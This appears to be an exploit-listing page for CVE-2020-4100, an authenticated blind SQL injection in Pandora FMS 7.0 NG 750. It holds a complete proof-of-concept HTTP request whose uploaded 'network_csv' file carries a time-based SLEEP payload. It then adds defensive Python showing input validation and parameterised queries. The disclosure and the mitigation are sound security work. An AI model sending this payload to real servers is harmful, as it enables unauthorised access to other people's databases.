Pandora FMS 7.0 NG 750 SQL Injection

CVE: CVE-2020-4100
Category: CWE-89
Price: Not specified
Severity: High
Author: Pandora FMS team
Risk: High
Exploitation Type: Remote
Date: 2020-12-23
CPE: cpe:cpe:/a:pandora_fms:pandora_fms:7.0
CVSS: CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.17353
EPSSP: 0.86266


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120155

Below is a copy:

# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv


# POC

POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"

1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"

300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"

0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"

0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"

1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"

test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"

3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"

on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a

-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"


-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"

test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"

Next
-----------------------------308827614039434535382911921119--
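The request above shows the pattern behind the finding: the uploaded "network_csv" file is meant to carry a list of networks for the scan task, but its raw contents end up inside an SQL statement, so a time-based payload in the file is enough to confirm blind injection. The defensive fix has two independent layers: validate the upload against the format it is supposed to have, and bind every value as a query parameter instead of concatenating it into SQL text. The following Python is an added example illustrating those two layers; it is not Pandora FMS code and does not reproduce the vendor's patch. It assumes the upload is a comma- or newline-separated list of IP addresses or CIDR networks (inferred from the parameter name, not stated on the page), uses an in-memory SQLite table with a made-up schema as a stand-in for the real MySQL backend, and uses the POC payload only as the input that must be rejected.

```python
import ipaddress
import sqlite3

# Constructed sample inputs: a plausible legitimate "network_csv" upload for a
# network scan task, and the injection payload from the POC request above.
GOOD_CSV = "192.168.1.0/24\n10.0.0.0/8, 172.16.5.10\n2001:db8::/32\n"
BAD_CSV = "' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a\n"


def parse_network_csv(data: str) -> list[str]:
    """Return the networks listed in the upload in canonical CIDR form.

    Every non-empty comma- or newline-separated token must parse as an IP
    address or network; anything else (including SQL fragments) raises
    ValueError, so the request is rejected before any query is built.
    The expected format is an assumption based on the parameter name.
    """
    networks = []
    for line in data.splitlines():
        for token in line.split(","):
            token = token.strip()
            if not token:
                continue
            try:
                # strict=False accepts host bits set, e.g. 10.0.0.1/8,
                # and a bare address becomes a /32 or /128 network.
                net = ipaddress.ip_network(token, strict=False)
            except ValueError as exc:
                raise ValueError(f"invalid network entry: {token!r}") from exc
            networks.append(net.with_prefixlen)
    if not networks:
        raise ValueError("network list is empty")
    return networks


def create_scan_task(conn: sqlite3.Connection, taskname: str,
                     comment: str, network_csv: str) -> int:
    """Validate the upload, then store the task with a parameterised query.

    Even if validation were bypassed, the values reach the database as bound
    parameters, never spliced into the SQL string. The recon_task schema is a
    hypothetical stand-in for illustration, not Pandora FMS's real table.
    """
    networks = parse_network_csv(network_csv)
    cur = conn.execute(
        "INSERT INTO recon_task (name, comment, subnet) VALUES (?, ?, ?)",
        (taskname, comment, ",".join(networks)),
    )
    return cur.lastrowid


def demo() -> dict:
    """Run both inputs through the hardened handler and report the outcome."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE recon_task (id INTEGER PRIMARY KEY, name TEXT, "
        "comment TEXT, subnet TEXT)"
    )
    results = {"accepted_id": create_scan_task(conn, "test", "test", GOOD_CSV)}
    try:
        create_scan_task(conn, "test", "test", BAD_CSV)
        results["rejected"] = False
    except ValueError:
        results["rejected"] = True
    results["rows"] = conn.execute("SELECT COUNT(*) FROM recon_task").fetchone()[0]
    return results


if __name__ == "__main__":
    print(demo())
```

The validator is the layer that gives a useful error to the user and a clean signal for logging (a rejected upload in the network scan wizard is worth an alert); the bound parameters are the layer that makes the injection impossible even when a future code change forgets to validate. Note that the time-based payload in the POC is designed to produce no visible error, so only the second layer, or a patched version of the product, actually closes the hole.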
